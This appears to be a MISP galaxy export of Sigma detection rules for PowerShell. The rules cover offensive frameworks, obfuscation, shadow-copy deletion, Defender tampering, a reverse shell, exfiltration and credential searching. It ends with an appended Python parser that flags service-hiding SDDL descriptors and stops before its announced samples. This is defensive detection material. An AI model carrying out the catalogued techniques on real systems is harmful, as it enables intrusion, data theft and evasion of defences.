https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml

Malicious PowerShell Scripts - PoshModule

Detects the execution of known offensive PowerShell scripts used for exploitation or reconnaissance

The tag is: misp-galaxy:sigma-rules="Malicious PowerShell Scripts - PoshModule"

Malicious PowerShell Scripts - PoshModule has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9638. Table References

Links

https://github.com/nettitude/Invoke-PowerThIEf

https://github.com/PowerShellMafia/PowerSploit

https://github.com/besimorhino/powercat

https://github.com/AlsidOfficial/WSUSpendu/

https://github.com/S3cur3Th1sSh1t/WinPwn

https://github.com/DarkCoderSc/PowerRunAsSystem/

https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries

https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1

https://github.com/NetSPI/PowerUpSQL

https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1

https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/

https://github.com/samratashok/nishang

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1

https://github.com/HarmJ0y/DAMP

https://github.com/CsEnox/EventViewer-UACBypass

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_exploit_scripts.yml

Suspicious PowerShell Invocations - Generic - PowerShell Module

Detects suspicious PowerShell invocation command parameters

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Invocations - Generic - PowerShell Module"

Suspicious PowerShell Invocations - Generic - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9639. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml

SyncAppvPublishingServer Bypass Powershell Restriction - PS Module

Detects SyncAppvPublishingServer process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions.

The tag is: misp-galaxy:sigma-rules="SyncAppvPublishingServer Bypass Powershell Restriction - PS Module"

SyncAppvPublishingServer Bypass Powershell Restriction - PS Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9640. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml

Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module

Detects Obfuscated Powershell via RUNDLL LAUNCHER

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module"

Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9641. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml

Invoke-Obfuscation VAR+ Launcher - PowerShell Module

Detects Obfuscated use of Environment Variables to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR+ Launcher - PowerShell Module"

Invoke-Obfuscation VAR+ Launcher - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9642. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml

Suspicious PowerShell Invocations - Specific - PowerShell Module

Detects suspicious PowerShell invocation command parameters

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Invocations - Specific - PowerShell Module"

Suspicious PowerShell Invocations - Specific - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9643. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml

Suspicious Computer Machine Password by PowerShell

The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain. You can use it to reset the password of the local computer.

The tag is: misp-galaxy:sigma-rules="Suspicious Computer Machine Password by PowerShell"

Suspicious Computer Machine Password by PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 9644. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml

Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module

Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.

The tag is: misp-galaxy:sigma-rules="Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module"

Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9645. Table References

Links

https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml

Use Get-NetTCPConnection - PowerShell Module

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

The tag is: misp-galaxy:sigma-rules="Use Get-NetTCPConnection - PowerShell Module"

Use Get-NetTCPConnection - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 9646. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml

Invoke-Obfuscation Via Use Rundll32 - PowerShell Module

Detects obfuscated PowerShell that uses Rundll32 in scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Rundll32 - PowerShell Module"

Invoke-Obfuscation Via Use Rundll32 - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9647. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_rundll32.yml

Zip A Folder With PowerShell For Staging In Temp - PowerShell Module

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

The tag is: misp-galaxy:sigma-rules="Zip A Folder With PowerShell For Staging In Temp - PowerShell Module"

Zip A Folder With PowerShell For Staging In Temp - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

Table 9648. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml

Change User Agents with WebRequest

Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

The tag is: misp-galaxy:sigma-rules="Change User Agents with WebRequest"

Change User Agents with WebRequest has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 9649. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml

Powershell Token Obfuscation - Powershell

Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation

The tag is: misp-galaxy:sigma-rules="Powershell Token Obfuscation - Powershell"

Powershell Token Obfuscation - Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Embedded Payloads - T1027.009" with estimative-language:likelihood-probability="almost-certain"

Table 9651. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_token_obfuscation.yml

Usage Of Web Request Commands And Cmdlets - ScriptBlock

Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs

The tag is: misp-galaxy:sigma-rules="Usage Of Web Request Commands And Cmdlets - ScriptBlock"

Usage Of Web Request Commands And Cmdlets - ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9652. Table References

Links

https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell

https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml

Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock

Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.

The tag is: misp-galaxy:sigma-rules="Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock"

Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9653. Table References

Links

https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml

Powershell Install a DLL in System Directory

Uses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64"

The tag is: misp-galaxy:sigma-rules="Powershell Install a DLL in System Directory"

Powershell Install a DLL in System Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1556.002" with estimative-language:likelihood-probability="almost-certain"

Table 9654. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml

PowerShell WMI Win32_Product Install MSI

Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class

The tag is: misp-galaxy:sigma-rules="PowerShell WMI Win32_Product Install MSI"

PowerShell WMI Win32_Product Install MSI has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

Table 9655. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml

Invoke-Obfuscation STDIN+ Launcher - Powershell

Detects Obfuscated use of stdin to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation STDIN+ Launcher - Powershell"

Invoke-Obfuscation STDIN+ Launcher - Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9656. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml

PowerShell Remote Session Creation

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.

The tag is: misp-galaxy:sigma-rules="PowerShell Remote Session Creation"

PowerShell Remote Session Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9657. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml

Extracting Information with PowerShell

Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

The tag is: misp-galaxy:sigma-rules="Extracting Information with PowerShell"

Extracting Information with PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 9658. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml

Delete Volume Shadow Copies via WMI with PowerShell - PS Script

Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil.

The tag is: misp-galaxy:sigma-rules="Delete Volume Shadow Copies via WMI with PowerShell - PS Script"

Delete Volume Shadow Copies via WMI with PowerShell - PS Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 9659. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml

Tamper Windows Defender - ScriptBlockLogging

Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.

The tag is: misp-galaxy:sigma-rules="Tamper Windows Defender - ScriptBlockLogging"

Tamper Windows Defender - ScriptBlockLogging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9660. Table References

Links

https://bidouillesecurity.com/disable-windows-defender-in-powershell/

https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml

Suspicious PowerShell WindowStyle Option

Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden.

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell WindowStyle Option"

Suspicious PowerShell WindowStyle Option has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

Table 9661. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml

Powershell MsXml COM Object

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code.

The tag is: misp-galaxy:sigma-rules="Powershell MsXml COM Object"

Powershell MsXml COM Object has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9662. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt

https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml

Powershell Detect Virtualization Environment

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox.

The tag is: misp-galaxy:sigma-rules="Powershell Detect Virtualization Environment"

Powershell Detect Virtualization Environment has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

Table 9663. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md

https://techgenix.com/malicious-powershell-scripts-evade-detection/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml

Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell

Detects PowerShell obfuscated with the Invoke-Obfuscation COMPRESS OBFUSCATION technique.

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell"

Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9664. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml

Potential PowerShell Obfuscation Using Character Join

Detects specific techniques often seen used inside PowerShell scripts to obfuscate alias creation.

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Obfuscation Using Character Join"

Potential PowerShell Obfuscation Using Character Join has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9665. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml

PowerView PowerShell Cmdlets - ScriptBlock

Detects Cmdlet names from PowerView of the PowerSploit exploitation framework.

The tag is: misp-galaxy:sigma-rules="PowerView PowerShell Cmdlets - ScriptBlock"

PowerView PowerShell Cmdlets - ScriptBlock has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9666. Table References

Links

https://adsecurity.org/?p=2277

https://powersploit.readthedocs.io/en/stable/Recon/README

https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon

https://thedfirreport.com/2020/10/08/ryuks-return

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml

PowerShell Create Local User

Detects creation of a local user via PowerShell

The tag is: misp-galaxy:sigma-rules="PowerShell Create Local User"

PowerShell Create Local User has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

Table 9667. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml

PSAsyncShell - Asynchronous TCP Reverse Shell

Detects the use of PSAsyncShell, an asynchronous TCP reverse shell written in PowerShell.

The tag is: misp-galaxy:sigma-rules="PSAsyncShell - Asynchronous TCP Reverse Shell"

PSAsyncShell - Asynchronous TCP Reverse Shell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9668. Table References

Links

https://github.com/JoelGMSec/PSAsyncShell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml

Powershell Exfiltration Over SMTP

Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.

The tag is: misp-galaxy:sigma-rules="Powershell Exfiltration Over SMTP"

Powershell Exfiltration Over SMTP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"

Table 9669. Table References

Links

https://www.ietf.org/rfc/rfc2821.txt

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml

Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell

Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file

The tag is: misp-galaxy:sigma-rules="Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell"

Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 9670. Table References

Links

https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml

Potential Persistence Via PowerShell User Profile Using Add-Content

Detects calls to "Add-Content" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via PowerShell User Profile Using Add-Content"

Potential Persistence Via PowerShell User Profile Using Add-Content has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1546.013" with estimative-language:likelihood-probability="almost-certain"

Table 9671. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_profile_tampering.yml

Abuse of Service Permissions to Hide Services Via Set-Service - PS

Detects usage of the "Set-Service" PowerShell cmdlet to configure a new security descriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service", etc. (Works only in PowerShell 7, where Set-Service accepts an SDDL security descriptor.)

The tag is: misp-galaxy:sigma-rules="Abuse of Service Permissions to Hide Services Via Set-Service - PS"

Abuse of Service Permissions to Hide Services Via Set-Service - PS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 9672. Table References

Links

https://twitter.com/Alh4zr3d/status/1580925761996828672

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml
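Added example for the Set-Service entry above (not part of the MISP galaxy or of the Sigma rule): a small Python parser that pulls the SDDL string out of a logged Set-Service invocation and flags the deny ACEs that make a service disappear from enumeration. The two-letter rights codes follow the Windows service SDDL mapping; the DCLCWPDTSD run is the string the rule keys on. The script block text and both SDDL strings are constructed for this example (not copied from the referenced tweet), and the parameter spellings the regex accepts (-SecurityDescriptorSddl / -sd) are an assumption about how the call shows up in Event ID 4104 ScriptBlockText.

```python
import re

# Service-specific rights as they appear in SDDL ACE strings (the Windows service SDDL
# letter codes). The hiding technique denies the DCLCWPDTSD run the rule keys on.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG", "LC": "SERVICE_QUERY_STATUS",
    "SW": "SERVICE_ENUMERATE_DEPENDENTS", "RP": "SERVICE_START", "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE", "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
HIDE_RIGHTS = ["DC", "LC", "WP", "DT", "SD"]  # DCLCWPDTSD

# ACE string: (ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
ACE_RE = re.compile(r"\((?P<type>[A-Z]+);(?P<flags>[A-Z]*);(?P<rights>[A-Za-z0-9]*);"
                    r"(?P<obj>[^;]*);(?P<inh>[^;]*);(?P<trustee>[^)]+)\)")
DACL_RE = re.compile(r"D:(?P<flags>[A-Z]*)(?P<aces>(?:\([^)]*\))*)")


def parse_dacl(sddl):
    """Return the DACL ACEs of an SDDL string as dicts: type (A=allow, D=deny), rights, trustee."""
    m = DACL_RE.search(sddl)
    if not m:
        return []
    aces = []
    for ace in ACE_RE.finditer(m.group("aces")):
        r = ace.group("rights")
        rights = [r] if r.startswith("0x") else [r[i:i + 2] for i in range(0, len(r), 2)]
        aces.append({"type": ace.group("type"), "rights": rights, "trustee": ace.group("trustee")})
    return aces


def find_hiding_aces(sddl):
    """Flag deny ACEs that strip SERVICE_QUERY_STATUS (LC) from a trustee.

    A trustee denied LC cannot query the service's status, so the service drops out of
    sc query / Get-Service enumeration for that trustee; that is the effect the hiding
    descriptor relies on, and a normal service DACL contains no such deny ACE.
    """
    return [
        {"trustee": a["trustee"], "denied": [x for x in a["rights"] if x in HIDE_RIGHTS]}
        for a in parse_dacl(sddl)
        if a["type"] == "D" and "LC" in a["rights"]
    ]


def sddl_from_scriptblock(text):
    """Pull the SDDL argument out of a logged Set-Service call (assumed 4104 text shape)."""
    m = re.search(r"Set-Service\b.*?-(?:SecurityDescriptorSddl|sd)\s+['\"]?([^'\"\s]+)", text, re.I)
    return m.group(1) if m else None


# Constructed samples: a hiding descriptor that denies DCLCWPDTSD to interactive users (IU),
# service logons (SU) and Administrators (BA), and an allow-only descriptor for comparison.
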